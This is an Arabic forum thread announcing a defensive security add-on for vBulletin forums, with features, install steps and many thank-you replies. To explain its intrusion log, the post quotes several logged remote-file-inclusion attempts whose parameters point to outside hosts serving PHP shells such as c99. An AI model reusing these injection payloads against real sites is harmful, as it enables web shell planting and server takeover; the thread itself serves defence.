المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : حمايه كامله للمنتدى من جميع الثغرات i.s.s.w v4.1


abohmam
02-05-2008, 08:30 PM
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اسم المنتج : حماية المنتدي i.s.s.w
الإصدار : i.s.s.w v 4.1
المبرمجين : الفريق الامني M.M.A i.s.s.w
جديد الاصدار :
1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
2: امكانية التحكم في الصفحة التي تعرض للمخترق
3: اضافه لوحت تحكم مختصره cp vb
4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
5 : تنبية في التحديث
6: تعديلات في عمل الهاك وتحديثة
7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا
نطلب الدعاء لنا في التوفيق وثبات الايمان
اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني



http://www.abc4web.net/vb/imgcache/3075.abc4web

عمل الهاك : حماية المنتدى بشكل كامل بعون الله


http://www.abc4web.net/vb/imgcache/3076.abc4web

http://www.abc4web.net/vb/imgcache/3077.abc4web

الخيار الاول : لتشغيل حمايه المنتدي

منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

حجب عدة مواقع تساعد على العبث في المنتديات

تطوير للدوال القديمة للتوافق معه السيرفر

منع اكثر اوامر اليونكس وحيل الحقن في الشيل

اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :abc_050:

الخيار الثاني :
منع اكواد التحويل لاخر عشر مواضيع
والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع

الان نأتي للقسم الاكثر اثارة للموضوع

عند دخولك مجلد sec

افتح الملف logfile_hacker.txt

ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

2007-12-11, 05:50:44, 1197370244, 209.67.223.188, p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
2007-12-11, 06:32:22, 1197372742, 203.211.135.147, t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

2007-12-11, 07:09:46, 1197374986, 211.157.108.187, p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
2007-12-11, 09:15:08, 1197382508, 200.102.138.66, t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library)


الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

طبعا الفاصلة تفصل بين كل معلومه ومعلومة

,

التاريخ والوقت

2007-12-11, 05:50:44,

عدد المحاولات
1197370244

ايبي الموقع المصااب
209.67.223.188

الاصابة طبعا تشفرت لاغراض امنيه
p=11575//codebb/lang_select

الاستغلال
?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?

نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
libwww-perl/5.808

الان شرح التركيب

امسح جميع هاكات لها علاقه في الحمايه او منع xss

اما من ركب هاك الحمايه issw v4.0 issw v3

عليه فقط حذف ملف البرودكت

وتركيب المحدث

شرح حذف الهاك

من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

ومن ثم حذف توابعه

---------------------------------------------------------------------------
التركيب
لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
upload
ارفع المجلد sec
الى مجلد المنتدي الرئيسي
اعطي التصريح 666 counter.txt logfile_hacker.txt

وارفع cpnav_issw
داخل
vb\includes\xml
قوم باستدعاء البروديكت من لوحت تحكم المنتدي

واتمنى لكم النجاح في التنصيب
ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

مع
تحيات الفريق الامني

الان من لوحت تحكم المنتدي قم برفع البرودكت

تم تجربت المنتج على الاصدار

3.6.0 الى 3.7.0


الحمد لله على كل شيء

لابري ذمتي عند نزع الحقوق تحصل مشاكل للقواعد اي تغير في سطر الحقوق
وهذا وانا افصح لكم عشان محدا يلومني مثل ماصار فيكم في الاصدار الاسبق

اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
وشكرا لكم

لتحميل الهاك


:dw2: (http://www.abc4web.net/vb/uploaded/1_i.s.s.wv4.1.zip)


رابط الموضوع الاصلي
http://www.is-sw.net/vb/showthread.php?t=4329

بالتوفيق

المصمم
02-05-2008, 09:26 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

التائب
03-05-2008, 02:09 PM
(`'•.¸(` '•. ¸ * ¸.•'´)¸.•'´)
«´¨`.¸.* شكرا لك اخي*. ¸.´¨`»
«´¨`.¸.* بارك الله فيك *. ¸.´¨`»
(¸. •'´(¸.•'´ * `'•.¸)`'•.¸ )

abohmam
03-05-2008, 10:32 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

(`'•.¸(` '•. ¸ * ¸.•'´)¸.•'´)
«´¨`.¸.* شكرا لك اخي*. ¸.´¨`»
«´¨`.¸.* بارك الله فيك *. ¸.´¨`»
(¸. •'´(¸.•'´ * `'•.¸)`'•.¸ )

حياكم الله إخواني

موفقين بإذن الله ... لكم مني أجمل تحية .

AlmajedGroup
04-05-2008, 01:08 AM
جزاك الله خيراً أستاذنا العزيز

أبــ فادي ــو
06-07-2008, 03:40 PM
جزاك الله خيرا اخى الحبيب ابو همام

المحزونه
06-07-2008, 06:47 PM
شكرا على الهاك اخي الكريم

صديق 1
22-08-2008, 03:40 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

مبدع الإمارات
27-08-2008, 02:20 PM
جزاك الله خير و إلى الأمام دائما

البرنسيس
09-09-2008, 06:04 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

waB90
13-09-2008, 01:31 AM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

redagoda
15-09-2008, 11:01 AM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

hussain1
18-09-2008, 09:58 AM
بالتوفيق
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

ساكن القلوب
03-10-2008, 12:32 PM
http://www.gulfup.com/up/pifiles/7Us11072.gif (http://www.gulfup.com/)

lasketchup
09-10-2008, 03:18 AM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .